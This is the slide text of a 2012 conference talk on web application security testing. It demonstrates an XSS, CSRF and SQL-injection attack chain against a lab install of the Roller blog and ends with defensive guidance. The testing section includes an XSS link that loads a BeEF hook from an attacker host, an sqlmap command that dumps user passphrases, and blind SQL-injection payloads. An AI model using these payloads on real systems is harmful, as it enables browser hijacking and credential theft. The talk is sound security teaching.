security testing: thinking like an attacker · java ee web security by example 3 what you should...
TRANSCRIPT
T17 Track
10/4/2012 1:30:00 PM
"Security Testing: Thinking Like an
Attacker"
Presented by:
Frank Kim
ThinkSec
Brought to you by:
340 Corporate Way, Suite 300, Orange Park, FL 32073
888-268-8770 ∙ 904-278-0524 ∙ [email protected] ∙ www.sqe.com
Frank Kim ThinkSec
The founder and principal consultant with ThinkSec, Frank Kim is the curriculum lead for
application security at the SANS Institute. With more than fourteen years of experience in
software development, information technology, and security, Frank has designed, developed,
and tested applications for large healthcare, technology, insurance, and consulting companies.
He currently focuses on security strategy and application security program development with a
special interest in integrating security into the software development lifecycle. Frank is the
author of the SANS Institute's Secure Coding in Java/JEE course and a speaker at international
events.
8/27/2012
1
Security TestingThinking Like an Attacker
STARWEST 2012
Java EE Web Security By Example 2
About
• Frank Kim
– Consultant, ThinkSec
– Author, SANS Secure Coding in Java/JEE
– SANS Application Security Curriculum Lead
8/27/2012
2
Java EE Web Security By Example 3
What You Should Know
• Hackers are clever
• Don’t trust any data
–Assume that your users are evil!
Java EE Web Security By Example 4
Outline
• Web App Attack Refresher
– XSS, CSRF, SQL Injection
• Testing
– Hacking an open source app
• Wrap Up
– Finding security bugs
8/27/2012
3
Java EE Web Security By Example 5
Cross-Site Scripting (XSS)
• Occurs when unvalidated data is displayed back to the browser
• Types of XSS
–Stored
–Reflected
–Document Object Model (DOM) based
Java EE Web Security By Example 6
Tennis anyone?
8/27/2012
4
Java EE Web Security By Example 7
Maria Sharapova
Java EE Web Security By Example 8
Cross-Site Request Forgery (CSRF)
8/27/2012
5
Java EE Web Security By Example 9
SQL Injection (SQLi)
• Occurs when dynamic SQL queries are used
– By injecting arbitrary SQL commands, attackers can extend the meaning of the original query
– Can potentially execute any SQL statement on the database
• Very powerful
– #1 on CWE/SANS Top 25 Most Dangerous Software Errors
– #1 on OWASP Top 10
Java EE Web Security By Example 10
Outline
• Web App Attack Refresher
– XSS, CSRF, SQL Injection
• Testing
– Hacking an open source app
• Wrap Up
– Finding security bugs
8/27/2012
6
Java EE Web Security By Example 11
What are We Testing?
• Installation of Roller 3.0
• Fake install of SANS AppSec Street Fighter Blog
• Want to simulate the actions that a real attacker might take
– There are definitely other avenues of attack
– We're walking through one attack scenario
Java EE Web Security By Example 12
Attack Scenario
1) XSS to control the victim's browser
2) Combine XSS and CSRF to conduct a privilege escalation attack- Use escalated privileges to access another feature
3) Use SQL Injection to access the database directly
8/27/2012
7
Java EE Web Security By Example 13
Testing the "look" Param
• Admin pages include head.jsp
• The param is persistent for the session
Java EE Web Security By Example 14
XSS Exploitation
• Introducing BeEF
– Browser Exploitation Framework
– http://www.bindshell.net/tools/beef
• Uses XSS to hook the victim's browser
– Log user keystrokes, view browsing history, execute JavaScript, etc
– Advanced attacks - Metasploit integration, browser exploits, etc
8/27/2012
8
Java EE Web Security By Example 15
XSS Exploitation Overview
Attacker Victim
1) Sends link with evil BeEF script
http://localhost:8080/roller/roller-ui/yourWebsites.do?look="><script src="http://www.attacker.com/beef/hook/beefmagic.js.php"></script>
2) Victim clicks evil link
3) Victim's browser sends data to attacker
BeEF XSS Demo
8/27/2012
9
Java EE Web Security By Example 17
Spot the Vuln - CSRF
Java EE Web Security By Example 18
CSRF in UserAdmin.jsp
Want to use CSRF to change
this field
8/27/2012
10
CSRF Demo
Java EE Web Security By Example 20
SQL Injection Testing
•UserServlet is vulnerable to SQLihttp://localhost:8080/roller/roller-ui/authoring/user
No results
8/27/2012
11
Java EE Web Security By Example 21
Exploiting SQL Injection
• Introducing sqlmap
– http://sqlmap.sourceforge.net
• Tool that automates detection and exploitation of SQL Injection vulns
– Supports MySQL, Oracle, PostgreSQL, MS SQL Server
– Supports blind, inband, and batch queries
– Fingerprint/enumeration - dump db schemas, tables/column names, data, db users, etc
– Takeover features - read/upload files, exec arbitrary commands, exec Metasploit shellcode, etc
Java EE Web Security By Example 22
sqlmap Syntax
� Dump userids and passwordspython sqlmap.py
-u "http://localhost:8080/roller/roller-
ui/authoring/user?startsWith=f%25"
--cookie "username=test; JSESSIONID==<INSERT HERE>"
--drop-set-cookie -p startsWith
--dump -T rolleruser -C username,passphrase -v 2
8/27/2012
12
SQL Injection Demo
Java EE Web Security By Example 24
How it Works
f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS
CHAR(10000)), CHAR(32)) FROM roller.rolleruser
LIMIT 2, 1), 1, 1)) > 103 AND 'neEy' LIKE 'neEy
f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS
CHAR(10000)), CHAR(32)) FROM roller.rolleruser
LIMIT 2, 1), 1, 1)) > 104 AND 'neEy' LIKE 'neEy
f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS
CHAR(10000)), CHAR(32)) FROM roller.rolleruser
LIMIT 2, 1), 1, 1)) > 105 AND 'neEy' LIKE 'neEy
8/27/2012
13
Java EE Web Security By Example 25
Step By Step [0]
SELECT IFNULL(CAST(passphrase AS CHAR(10000)),
CHAR(32)) FROM roller.rolleruser LIMIT 2, 1;
returns ilovethetajmahal
Java EE Web Security By Example 26
Step By Step [1]
select MID((SELECT IFNULL(CAST(passphrase AS
CHAR(10000)), CHAR(32)) FROM roller.rolleruser
LIMIT 2, 1), 1, 1);
returns i
select MID((SELECT IFNULL(CAST(passphrase AS
CHAR(10000)), CHAR(32)) FROM roller.rolleruser
LIMIT 2, 1), 2, 1);
returns l
select MID((SELECT IFNULL(CAST(passphrase AS
CHAR(10000)), CHAR(32)) FROM roller.rolleruser
LIMIT 2, 1), 3, 1);
returns o
8/27/2012
14
Java EE Web Security By Example 27
Step By Step [2]
select ORD(MID((SELECT IFNULL(CAST(passphrase AS
CHAR(10000)), CHAR(32)) FROM roller.rolleruser
LIMIT 2, 1), 1, 1));
returns 105
select ORD(MID((SELECT IFNULL(CAST(passphrase AS
CHAR(10000)), CHAR(32)) FROM roller.rolleruser
LIMIT 2, 1), 2, 1));
returns 108
select ORD(MID((SELECT IFNULL(CAST(passphrase AS
CHAR(10000)), CHAR(32)) FROM roller.rolleruser
LIMIT 2, 1), 3, 1));
returns 111
Java EE Web Security By Example 28
Attack Summary
1) XSS to control the victim's browser
2) Combine XSS and CSRF to conduct a privilege escalation attack- Use escalated privileges to access another feature
3) Use SQL Injection to access the database directly
8/27/2012
15
Java EE Web Security By Example 29
Outline
• Web App Attack Refresher
– XSS, CSRF, SQL Injection
• Testing
– Hacking an open source app
• Wrap Up
– Finding security bugs
Java EE Web Security By Example 30
Application
Should I be consuming this?
Should I be emitting this?
Data Validation
Inbound Data
Outbound Data
Data Store
Validation
Encoding
Encoding
Validation
Outbound Data
Inbound Data
Validation
8/27/2012
16
Java EE Web Security By Example 31
Output Encoding
• Encoding– Convert characters so they are treated as data and not special characters
• Must escape differently depending where data is displayed on the page
• XSS Prevention Cheat Sheethttp://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
Java EE Web Security By Example 32
What do Attackers Look For?
• XSS
– Unencoded data in the web page
• CSRF– Lack of random tokens in the form
– Sensitive forms that can be submitted multiple times without authorization
• SQL Injection
– Parameters that accept SQL
8/27/2012
17
Java EE Web Security By Example 33
Building Secure Software
Source: Microsoft SDL
Java EE Web Security By Example 34
Remember
• Hackers are clever
• Don’t trust any data– Think about what the system is not supposed to do